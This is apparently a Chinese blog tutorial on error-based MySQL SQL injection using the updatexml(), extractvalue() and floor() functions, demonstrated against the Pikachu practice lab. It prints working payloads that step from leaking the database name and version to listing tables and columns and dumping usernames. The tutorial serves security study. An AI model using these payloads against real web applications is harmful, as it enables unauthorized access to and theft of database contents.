SQL Inject-基于报错的信息获取

news/2024/10/4 14:23:48 标签: sql, 数据库

常用的用来报错的函数
updatexml() :   函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
extractvalue(): 函数也是MYSQL对XML文档数据进行查询的XPATH函数。
floor():             MYSQL中用来取整的函数。

思路:

在MySQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。select / insert / update / delete 都可以使用报错来获取信息。

前提条件是后台没有屏蔽数据库报错信息,在语法发生错误时,会输出到前端。

updatexml()
Updatexm()函数作用: 改变(查找并替换) XML文档中符合条件的节点的值。
语法: UPDATEXML (xml document, XPathstring, new_value)

第一个参数: fiedname是String格式,为表中的字段名。
第二个参数: XPathstring (Xpath格式的字符串)。
第三个参数: new. value,String格式,替换查找到的符合条件的

Xpath定位必须是有效的,否则会发生错误。 

pikachu - 字符型注入(GET) 实验:

aa' and updatexml(1,concat(0x7e,database()),0)#

// 0x7e  是 ~ 的十六进制 ,避免报错信息被吃掉;

如果没有concat ,而是aa' and updatexml(1,database(),0)#   

这样报错信息会少一部分,没法完全展示;

获取到了数据库名称 pikachu,我们可以把 database() 替换成任意我们想要获得的东西。

得到数据库名称后,根据数据库名,查询表名

aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu')),0)#
// 中间的select 语句要用() 括号括起来

//查询报多于一行
aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu' limit 1)),0)#

使用上述语句,查到第一张表名;继续使用limit 1,1   或 limit 2,1 查询下去,可以把所有的表名查询出来; 或者burp suite  参数化查询把所有表查出来。

得到表名后,可以根据表名查询字段名

aa' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),0)#

得到所有列名。可以根据列名获取数据

aa' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#


extractvalue()

extractvalue()函数作用:从目标XML中返回包含所查询值的字符串。
语法: ExtractValue(xm| _document, xpath. string)

第一个参数: XML document是String格式,为XML文档对象的名称,文中为Doc
第二个参数: XPath_ string (Xpath格式的字符串)

Xpath定位必须是有效的,否则会发生错误。
打开字符型注入,输入payload。

aa' and extractvalue(0,concat(0x7e,version()))#


效果差不多,理解以此类推即可。

floor()

原因:floor()报错注入的原因是 groupby 在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前 concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或数执行后的结果。

floor()函数:对传入的值进行向下取整操作,并返回结果,如floor(1.999),则返回1 ;

rand()函数,返回随机数

rand(x)函数,x在这里代表参数,当rand()函数有了参数后,生成的就是伪随机数,什么意思呢?比如你使用rand(0)产生的第一个随机数产生的随机数相同,也就是当rand(x)这个参数x已知的时候我们就能知道;

在字符型中输入payload得到版本号。

aa' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#


 


http://www.niftyadmin.cn/n/5690019.html

相关文章

双指针,平衡二叉树与最小生成树

双指针,平衡二叉树与最小生成树

1:直方图的水量 题目链接:面试题 17.21. 直方图的水量 - 力扣(LeetCode) 双指针 初始化:我们使用两个指针 left 和 right 分别指向数组的开始和结束。同时,我们记录下这两个位置的高度,即 max…
阅读更多...
C++ STL 初探:打开标准模板库的大门

C++ STL 初探:打开标准模板库的大门

文章目录 C STL 初探:打开标准模板库的大门前言第一章: 什么是STL?1.1 标准模板库简介1.2 STL的历史背景1.3 STL的组成 第二章: STL的版本与演进2.1 不同的STL版本2.2 STL的影响与重要性 第三章: 为什么学习 STL?3.1 从手动编写到标准化解决方…
阅读更多...
【C++】——list的介绍和模拟实现

【C++】——list的介绍和模拟实现

P. S.:以下代码均在VS2019环境下测试,不代表所有编译器均可通过。 P. S.:测试代码均未展示头文件stdio.h的声明,使用时请自行添加。 博主主页:Yan. yan.                        …
阅读更多...
Python酷库之旅-第三方库Pandas(133)

Python酷库之旅-第三方库Pandas(133)

目录 一、用法精讲 596、pandas.DataFrame.plot.density方法 596-1、语法 596-2、参数 596-3、功能 596-4、返回值 596-5、说明 596-6、用法 596-6-1、数据准备 596-6-2、代码示例 596-6-3、结果输出 597、pandas.DataFrame.plot.hexbin方法 597-1、语法 597-2、…
阅读更多...
【宽搜】1. 层序遍历模板讲解

【宽搜】1. 层序遍历模板讲解

题目描述 题目链接:N叉树的层序遍历 层序遍历流程 请仔细阅读下图: 根据上图的流程,下面再明确几个问题: 1. 为什么要使用队列? 队列是先进先出的数据结构,在数的层序遍历中,需要先将节点p…
阅读更多...
Spring Boot新闻推荐系统设计与实现

Spring Boot新闻推荐系统设计与实现

3系统分析 3.1可行性分析 通过对本新闻推荐系统实行的目的初步调查和分析,提出可行性方案并对其一一进行论证。我们在这里主要从技术可行性、经济可行性、操作可行性等方面进行分析。 3.1.1技术可行性 本新闻推荐系统采用JAVA作为开发语言,Spring Boot框…
阅读更多...
IPsec手动方式

IPsec手动方式

文章目录 实验要求实验配置 实验要求 配置 IPsec vpn 采用手动方式同时要满足上网和VPN两种需求使用NAT进行地址映射认证方法和加密算法自行配置采用安全的方法 实验配置 R1: #基本配置sy sy R1 dhcp enable acl 2000 rule permit sour 192.168.1.0 0.0.0.255 int…
阅读更多...
【一文理解】conda install pip install 区别

【一文理解】conda install pip install 区别

大部分情况下,conda install & pip install 二者安装的package都可以正常work,但是混装多种package后容易版本冲突,出现各种报错。 目录 检查机制 支持语言 库的位置 环境隔离 编译情况 检查机制 conda有严格的检查机制&#xff0c…
阅读更多...
最新文章

Copyright @ 2022~2023